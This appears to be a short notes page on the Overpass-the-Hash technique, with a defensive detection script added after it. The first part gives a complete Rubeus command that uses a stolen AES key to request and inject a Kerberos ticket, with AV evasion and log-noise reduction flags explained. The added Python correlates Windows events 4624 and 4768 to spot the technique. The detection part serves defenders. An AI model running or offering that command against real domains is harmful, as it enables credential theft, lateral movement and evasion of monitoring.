Overpass-the-Hash

A technique for obtaining a TGT (Ticket Granting Ticket) using the account's AES key (loosely called an AES hash) instead of the password, thereby evading detection.

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:[USER] /aes256:[HASH] /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
  • Loader.exe: Runs Rubeus in memory (AV/Defender evasion).

  • asktgt: Requests a TGT from the KDC (Domain Controller).

  • /user /aes256: Target identity and secret (Overpass-the-Hash attack).

  • /opsec: Minimizes noise in the DC logs (simulates a legitimate login).

  • /createnetonly: Creates a new cmd.exe process in its own logon session (LUID), giving it an isolated network identity.

  • /ptt: Injects the ticket directly into the current session (Pass-the-Ticket attack).
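
From the defender's side, the /createnetonly step is recorded on the host as a Security event 4624 with LogonType 9 (NewCredentials) and logon process "seclogo", and the asktgt step is recorded on the DC as event 4768. The following is an added example, not part of the original page, that correlates the two over constructed sample events; the "host_ip" enrichment field and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed sample events (not from a real environment). Field names follow
# Windows Security events 4624 and 4768; "host_ip" is an assumed enrichment
# added by the log collector so host and DC events can be joined.
EVENTS = [
    {"id": 4624, "time": "2024-05-01T10:00:00", "host_ip": "10.0.0.21",
     "LogonType": 9, "LogonProcessName": "seclogo",
     "TargetUserName": "alice", "TargetLogonId": "0x3e4a1"},
    {"id": 4768, "time": "2024-05-01T10:00:03", "IpAddress": "::ffff:10.0.0.21",
     "TargetUserName": "svc_sql", "TicketEncryptionType": "0x12"},
    {"id": 4624, "time": "2024-05-01T11:00:00", "host_ip": "10.0.0.30",
     "LogonType": 2, "LogonProcessName": "User32",
     "TargetUserName": "bob", "TargetLogonId": "0x51c22"},
    {"id": 4768, "time": "2024-05-01T11:00:01", "IpAddress": "::ffff:10.0.0.30",
     "TargetUserName": "bob", "TicketEncryptionType": "0x12"},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def _ip(event):
    # DCs log IPv4 clients as IPv4-mapped IPv6 addresses (::ffff:a.b.c.d).
    return event["IpAddress"].replace("::ffff:", "")

def find_netonly_tgt_requests(events, window=WINDOW):
    """Pair each NewCredentials (type 9) logon with a TGT request for a
    different account that reaches the DC from the same host within `window`."""
    netonly = [e for e in events if e["id"] == 4624 and e["LogonType"] == 9
               and e["LogonProcessName"].strip().lower() == "seclogo"]
    tgts = [e for e in events if e["id"] == 4768]
    hits = []
    for logon in netonly:
        for tgt in tgts:
            same_host = _ip(tgt) == logon["host_ip"]
            close = abs(_ts(tgt) - _ts(logon)) <= window
            other = tgt["TargetUserName"].lower() != logon["TargetUserName"].lower()
            if same_host and close and other:
                hits.append({"host_ip": logon["host_ip"],
                             "logon_user": logon["TargetUserName"],
                             "logon_id": logon["TargetLogonId"],
                             "tgt_user": tgt["TargetUserName"],
                             "etype": tgt["TicketEncryptionType"]})
    return hits

if __name__ == "__main__":
    for hit in find_netonly_tgt_requests(EVENTS):
        print(hit)
```

Legitimate `runas /netonly` use produces the same 4624 pattern, so treat a hit as a lead to triage against the accounts and hosts involved rather than as a verdict.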